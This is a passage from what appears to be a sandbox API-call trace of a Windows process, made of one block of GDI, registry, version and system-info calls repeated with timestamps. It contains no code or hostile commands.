lpRect=0x18179c) returned 0 [0017.780] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.780] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.781] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x38040713 [0017.781] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e04027d [0017.781] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d60 [0017.781] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d61 [0017.781] CombineRgn (hrgnDst=0x1040d60, hrgnSrc1=0x38040713, hrgnSrc2=0x2e04027d, iMode=1) returned 1 [0017.781] CombineRgn (hrgnDst=0x1040d61, hrgnSrc1=0x38040713, hrgnSrc2=0x2e04027d, iMode=4) returned 2 [0017.781] CreateSolidBrush (color=0xff) returned 0x2100d5f [0017.781] CreateSolidBrush (color=0xff0000) returned 0x1100d62 [0017.781] DeleteObject (ho=0x1100d62) returned 1 [0017.781] DeleteObject (ho=0x2e04027d) returned 1 [0017.781] DeleteObject (ho=0x38040713) returned 1 [0017.781] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.781] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.781] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.781] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.781] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.781] BeginPath (hdc=0x0) returned 0 [0017.781] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.781] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.781] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.781] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.781] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.781] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.781] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.781] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.782] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f04027d [0017.782] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x39040713 [0017.782] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d63 [0017.782] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d64 [0017.782] CombineRgn (hrgnDst=0x1040d63, hrgnSrc1=0x2f04027d, hrgnSrc2=0x39040713, iMode=1) returned 1 [0017.782] CombineRgn (hrgnDst=0x1040d64, hrgnSrc1=0x2f04027d, hrgnSrc2=0x39040713, iMode=4) returned 2 [0017.782] CreateSolidBrush (color=0xff) returned 0x2100d62 [0017.782] CreateSolidBrush (color=0xff0000) returned 0x1100d65 [0017.782] DeleteObject (ho=0x1100d65) returned 1 [0017.782] DeleteObject (ho=0x39040713) returned 1 [0017.782] DeleteObject (ho=0x2f04027d) returned 1 [0017.782] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.782] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.782] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.782] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.782] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.782] BeginPath (hdc=0x0) returned 0 [0017.782] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.782] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.782] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.782] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.782] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.782] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.782] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.782] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.782] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a040713 [0017.782] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3004027d [0017.783] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d66 [0017.783] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d67 [0017.783] CombineRgn (hrgnDst=0x1040d66, hrgnSrc1=0x3a040713, hrgnSrc2=0x3004027d, iMode=1) returned 1 [0017.783] CombineRgn (hrgnDst=0x1040d67, hrgnSrc1=0x3a040713, hrgnSrc2=0x3004027d, iMode=4) returned 2 [0017.783] CreateSolidBrush (color=0xff) returned 0x2100d65 [0017.783] CreateSolidBrush (color=0xff0000) returned 0x1100d68 [0017.783] DeleteObject (ho=0x1100d68) returned 1 [0017.783] DeleteObject (ho=0x3004027d) returned 1 [0017.783] DeleteObject (ho=0x3a040713) returned 1 [0017.783] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.783] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.783] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.783] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.783] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.783] BeginPath (hdc=0x0) returned 0 [0017.783] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.783] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.783] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.783] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.783] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.783] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.783] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.783] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3104027d [0017.783] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b040713 [0017.783] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d69 [0017.783] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6a [0017.784] CombineRgn (hrgnDst=0x1040d69, hrgnSrc1=0x3104027d, hrgnSrc2=0x3b040713, iMode=1) returned 1 [0017.784] CombineRgn (hrgnDst=0x1040d6a, hrgnSrc1=0x3104027d, hrgnSrc2=0x3b040713, iMode=4) returned 2 [0017.784] CreateSolidBrush (color=0xff) returned 0x2100d68 [0017.784] CreateSolidBrush (color=0xff0000) returned 0x1100d6b [0017.784] DeleteObject (ho=0x1100d6b) returned 1 [0017.784] DeleteObject (ho=0x3b040713) returned 1 [0017.784] DeleteObject (ho=0x3104027d) returned 1 [0017.784] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.784] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.784] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.784] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.784] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.784] BeginPath (hdc=0x0) returned 0 [0017.784] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.784] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.784] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.784] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.784] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.784] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.784] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.784] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c040713 [0017.784] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3204027d [0017.784] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6c [0017.784] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6d [0017.784] CombineRgn (hrgnDst=0x1040d6c, hrgnSrc1=0x3c040713, hrgnSrc2=0x3204027d, iMode=1) returned 1 [0017.784] CombineRgn (hrgnDst=0x1040d6d, hrgnSrc1=0x3c040713, hrgnSrc2=0x3204027d, iMode=4) returned 2 [0017.784] CreateSolidBrush (color=0xff) returned 0x2100d6b [0017.785] CreateSolidBrush (color=0xff0000) returned 0x1100d6e [0017.785] DeleteObject (ho=0x1100d6e) returned 1 [0017.785] DeleteObject (ho=0x3204027d) returned 1 [0017.785] DeleteObject (ho=0x3c040713) returned 1 [0017.785] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.785] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.785] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.785] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.785] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.785] BeginPath (hdc=0x0) returned 0 [0017.785] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.785] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.785] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.785] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.785] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.785] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.785] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.785] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3304027d [0017.785] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d040713 [0017.785] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6f [0017.785] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d70 [0017.785] CombineRgn (hrgnDst=0x1040d6f, hrgnSrc1=0x3304027d, hrgnSrc2=0x3d040713, iMode=1) returned 1 [0017.785] CombineRgn (hrgnDst=0x1040d70, hrgnSrc1=0x3304027d, hrgnSrc2=0x3d040713, iMode=4) returned 2 [0017.785] CreateSolidBrush (color=0xff) returned 0x2100d6e [0017.785] CreateSolidBrush (color=0xff0000) returned 0x1100d71 [0017.785] DeleteObject (ho=0x1100d71) returned 1 [0017.785] DeleteObject (ho=0x3d040713) returned 1 [0017.785] DeleteObject (ho=0x3304027d) returned 1 [0017.785] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.786] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.786] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.786] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.786] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.786] BeginPath (hdc=0x0) returned 0 [0017.786] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.786] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.786] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.786] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.786] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.786] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.786] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.786] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e040713 [0017.786] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3404027d [0017.786] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d72 [0017.786] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d73 [0017.786] CombineRgn (hrgnDst=0x1040d72, hrgnSrc1=0x3e040713, hrgnSrc2=0x3404027d, iMode=1) returned 1 [0017.786] CombineRgn (hrgnDst=0x1040d73, hrgnSrc1=0x3e040713, hrgnSrc2=0x3404027d, iMode=4) returned 2 [0017.786] CreateSolidBrush (color=0xff) returned 0x2100d71 [0017.786] CreateSolidBrush (color=0xff0000) returned 0x1100d74 [0017.786] DeleteObject (ho=0x1100d74) returned 1 [0017.786] DeleteObject (ho=0x3404027d) returned 1 [0017.786] DeleteObject (ho=0x3e040713) returned 1 [0017.786] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.786] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.786] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.787] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.787] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.787] BeginPath (hdc=0x0) returned 0 [0017.787] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.787] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.787] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.787] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.787] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.787] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.787] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.787] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.787] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3504027d [0017.787] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f040713 [0017.787] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d75 [0017.787] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d76 [0017.787] CombineRgn (hrgnDst=0x1040d75, hrgnSrc1=0x3504027d, hrgnSrc2=0x3f040713, iMode=1) returned 1 [0017.787] CombineRgn (hrgnDst=0x1040d76, hrgnSrc1=0x3504027d, hrgnSrc2=0x3f040713, iMode=4) returned 2 [0017.787] CreateSolidBrush (color=0xff) returned 0x2100d74 [0017.787] CreateSolidBrush (color=0xff0000) returned 0x1100d77 [0017.787] DeleteObject (ho=0x1100d77) returned 1 [0017.787] DeleteObject (ho=0x3f040713) returned 1 [0017.787] DeleteObject (ho=0x3504027d) returned 1 [0017.787] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.787] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.787] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.787] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.787] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.787] BeginPath (hdc=0x0) returned 0 [0017.787] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.788] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.788] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.788] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.788] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.788] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.788] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.788] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.788] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40040713 [0017.788] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3604027d [0017.788] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d78 [0017.788] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d79 [0017.788] CombineRgn (hrgnDst=0x1040d78, hrgnSrc1=0x40040713, hrgnSrc2=0x3604027d, iMode=1) returned 1 [0017.788] CombineRgn (hrgnDst=0x1040d79, hrgnSrc1=0x40040713, hrgnSrc2=0x3604027d, iMode=4) returned 2 [0017.788] CreateSolidBrush (color=0xff) returned 0x2100d77 [0017.788] CreateSolidBrush (color=0xff0000) returned 0x1100d7a [0017.788] DeleteObject (ho=0x1100d7a) returned 1 [0017.788] DeleteObject (ho=0x3604027d) returned 1 [0017.788] DeleteObject (ho=0x40040713) returned 1 [0017.788] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.788] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.788] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.788] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.788] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.788] BeginPath (hdc=0x0) returned 0 [0017.788] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.788] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.788] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.788] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.789] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.789] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.789] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.789] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.789] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3704027d [0017.789] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x41040713 [0017.789] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7b [0017.789] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7c [0017.789] CombineRgn (hrgnDst=0x1040d7b, hrgnSrc1=0x3704027d, hrgnSrc2=0x41040713, iMode=1) returned 1 [0017.789] CombineRgn (hrgnDst=0x1040d7c, hrgnSrc1=0x3704027d, hrgnSrc2=0x41040713, iMode=4) returned 2 [0017.789] CreateSolidBrush (color=0xff) returned 0x2100d7a [0017.789] CreateSolidBrush (color=0xff0000) 